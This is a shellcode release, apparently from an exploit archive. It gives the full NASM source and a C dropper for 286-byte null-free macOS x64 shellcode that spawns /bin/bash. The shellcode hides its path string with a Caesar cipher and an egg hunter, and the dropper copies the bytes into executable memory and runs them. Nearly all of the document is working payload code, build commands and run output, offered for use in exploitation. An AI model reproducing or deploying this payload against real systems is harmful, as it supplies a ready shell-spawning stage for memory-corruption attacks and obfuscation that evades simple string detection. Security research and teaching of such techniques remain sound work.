macOS/x64 Execve Caesar Cipher String Null-Free Shellcode

286 bytes small macOS/x64 execve Caesar cipher string null-free shellcode.


SHA-256 | aa23ac4a240ae6871b72d0723b1c8d4ebded5889ad862b0dd0455f86699c05a2

# Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode (286 Bytes)
# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7
# Date: 12/20/2022
# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64
# Shellcode Description:
# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is ceasar cipher crypted with the increment key of 7 within the shellcode. The shellcode finds the string in memory, copies the string to the stack, deciphers the string, and then changes the string terminator to 0x00.
# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course!
# Compile & run:
# nasm -f macho64 execve.asm -o execve
# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
# # Add shellcode to dropper.c
# gcc dropper.c -o dropper
# sh-3.2$ pstree -p $(echo $$) | grep $$
# \-+= 28533 bobby sh
# sh-3.2$ ./dropper
# [+] testcode Length: 286 Bytes
# [+] Copying testcode from variable at 0x10aeeade0 to allocated RWX memory at 0x10b030000
# [+] Executing testcode at 0x10b030000
# bobby$ pstree -p $(echo $$) | grep -B1 $$
# \-+= 28533 bobby sh
# \-+= 28584 bobby (bash)

bits 64
global _main

_main:
create_stackframe:
push rbp ; push current base pointer to the stack
mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame
sub rsp, 0x60 ; create space for string
mov [rbp-0x8], rsp ; Save destination string buffer address
jmp short lilypad_1

; char * string eggHunter(egg);
; RAX RDIa
; description: starts searching for the supplied egg starting from the callers return address
eggHunter:
mov rcx, [rsp] ; start the egghunter from the caller function return address
hunt:
inc rcx ; move to the hunter to the next byte
cmp [rcx], di ; did we find the first egg?
jne hunt ; if not, continue hunt

add cx, 0x2 ; move hunter to 2nd egg location
cmp [rcx], di ; did we find the second egg?
jne hunt ; if not, continue hunt

add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr
xchg rax, rcx ; return start of string address
ret

; int length strsize(&string, terminator);
; RAX RDI RSI
; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.
strsize:
xor rax, rax ; clear register
xor rcx, rcx ; set the counter to zero
strsize_loop:
mov rcx, rdi ; start of string address
add rcx, rax ; current memory location of char in string
cmp [rcx], sil ; is this the null terminator?
je strsize_return
prevent_infinite_loop:
cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning)
jg strsize_fail2find ; if value in RAX is greater, jump to label
inc rax ; move to the next char in the string
jmp strsize_loop
strsize_fail2find:
xor rax, rax ; return null/ 0x0
strsize_return:
ret

lilypad_1:
jmp short lilypad_2

; char * string terminateString(&string, terminator);
; RAX RDI RSI
; description: Finds the string terminator and changes it to a null byte
terminateString:
xor rcx, rcx ; set the counter to zero
mov rcx, rdi ; start address to look for terminator
loop_find_terminator:
cmp [rcx], sil ; is this the null terminator?
je found_terminator
inc rcx ; move to the next char in the string
jmp loop_find_terminator
found_terminator:
mov [rcx], al
ret

; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);
; RAX RDI RSI RDX
; description: Move memory from source address to destination address
; ARG1 - RDI: destination address
; ARG2 - RSI: source address
; ARG3 - RDX: size of the memory
move_memory:
; Loop through memory and move each byte from source to destination
push rdi ; save the destination address so we can return it at the end
xor rax, rax ; register to temporarily hold the byte we are copying
move_memory_loop:
mov al, [rsi] ; read the byte from source address into the temporary register
mov [rdi], al ; write the byte at the destination address
inc rsi ; increment source address
inc rdi ; increment destination address
dec rdx ; decrement memory size
jnz move_memory_loop ; repeat loop until memory size is 0
; Return to caller
pop rax ; return the destination address of the memory to the caller
ret

lilypad_2:
jmp short lilypad_3

; void clear_memory(void *dst_addr, size_t mem_size);
; RDI RSI
; description: Writes 0x00 bytes to a destination address
; ARG1 - RDI: a pointer to the destination address
; ARG2 - RSI: the size of the memory to be written to
clear_memory:
mov rcx, rsi ; load memory size from second argument into rcx
xor rax, rax
; Loop through memory and write 0x00 to each byte in destination address
clrmem_loop:
mov byte [rdi], al ; write 0x00 to byte in destination address
inc rdi ; increment destination address
dec rcx ; decrement memory size
jnz clrmem_loop ; repeat loop until memory size is 0

ret ; Return to caller

; void basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);
; RDI RSI RDX
basicCaesar_Decrypt:
bcd_loop:
sub [rsi], dl ; Subtract the value of dl from the memory location pointed to by RSI
inc rsi ; Increment RSI to point to the next character
dec rdi ; Decrement stringLength counter
test rdi,rdi ; Test if stringLength counter is zero
jnz bcd_loop ; If stringLength counter is not zero, jump back to the beginning of the loop

ret ; Return to caller

lilypad_3:
; *string = eggHunter(egg); Starts hunt from return address of caller
find_execve_string:
xor rdi, rdi ; clear register
mov di, 0xBCB0 ; Arg 1: Our egg
call eggHunter ; returns string start address
mov [rbp-0x10], rax ; Save string address

get_strlen:
mov rdi, [rbp-0x10] ; Arg 1: string start address
xor rsi, rsi ; clear register
mov sil, 0xFF ; Arg 2: string terminator
call strsize ; returns string size
mov [rbp-0x18], rax ; Save string size

; move_memory(dst_addr, src_addr, mem_size);
; RDI RSI RDX
copy_str2stack:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
mov rsi, [rbp-0x10] ; Arg 2: Original string location
mov rdx, [rbp-0x18] ; Arg 3: size
call move_memory

; basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);
; RDI RSI RDX
do_caesar_cipher_decrypt:
mov rdi, [rbp-0x18] ; Arg 1: string size
mov rsi, [rbp-0x8] ; Arg 2: String buffer on stack
xor rdx, rdx ; clear register
add dl, 0x7 ; Arg 3: Ceaser Chiper Key: 7
call basicCaesar_Decrypt ; returns string size


do_terminate_string:
mov rdx, [rbp-0x18] ; string size
mov rdi, [rbp-0x8] ; String buffer on stack
add rdi, rdx ; Arg 1: string terminator location
xor rsi, rsi ; clear register
mov sil, 0x1 ; Arg 2: mem size to null
call clear_memory ; returns string size

; execve("/bin/bash",NULL,NULL)
execve:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
xor rsi, rsi ; Arg 2: NULL
xor rdx, rdx ; Arg 3: NULL
xor rax, rax ; clear register for syscall number setup
mov al, 0x2 ; set a bit in register
ror rax, 0x28 ; move the bit over 28 bits to the right in the register
mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number
syscall ; do the syscall interrupt

fixstack:
add rsp, 0x60 ; clear allocated stack space
pop rbp ; restore stack base pointer
ret ; return to caller

; ~~ Ceaser Chiper String Cryptor ~~
; Original String: /bin/bash
; String Length: 9
; Ceaser Chiper Key: 7
; Chiper String: 6ipu6ihzo
; unsigned char chiperString[] = {0x36,0x69,0x70,0x75,0x36,0x69,0x68,0x7a,0x6f};
; unsigned char chiperString[] = "\x36\x69\x70\x75\x36\x69\x68\x7a\x6f";
; Dechipered String: /bin/bash
shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"6ipu6ihzo",0xFF

###########################################################################################################################################

// dropper.c

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*execute_testcode)();

const unsigned char testcode[] =
"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x1f\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x28\x16\x48\xff\xc6\x48\xff\xcf\x48\x85\xff\x75\xf3\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x6d\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x76\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\x96\xff\xff\xff\x48\x8b\x7d\xe8\x48\x8b\x75\xf8\x48\x31\xd2\x80\xc2\x07\xe8\xab\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\x84\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x36\x69\x70\x75\x36\x69\x68\x7a\x6f\xff";

int main() {
size_t testcode_size = sizeof(testcode);

printf("[+] testcode Length: %lu Bytes\n", testcode_size);

void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

if (rwx_memory == MAP_FAILED) {
printf("[!] Failed to allocate RWX memory\n");
perror("mmap");
exit(-1);
}

printf("[+] Copying testcode from variable at %p to allocated RWX memory at %p\n",testcode,rwx_memory);
memcpy(rwx_memory, testcode, sizeof(testcode));
execute_testcode = rwx_memory;

printf("[+] Executing testcode at %p\n",rwx_memory);
execute_testcode();
return 0;
}

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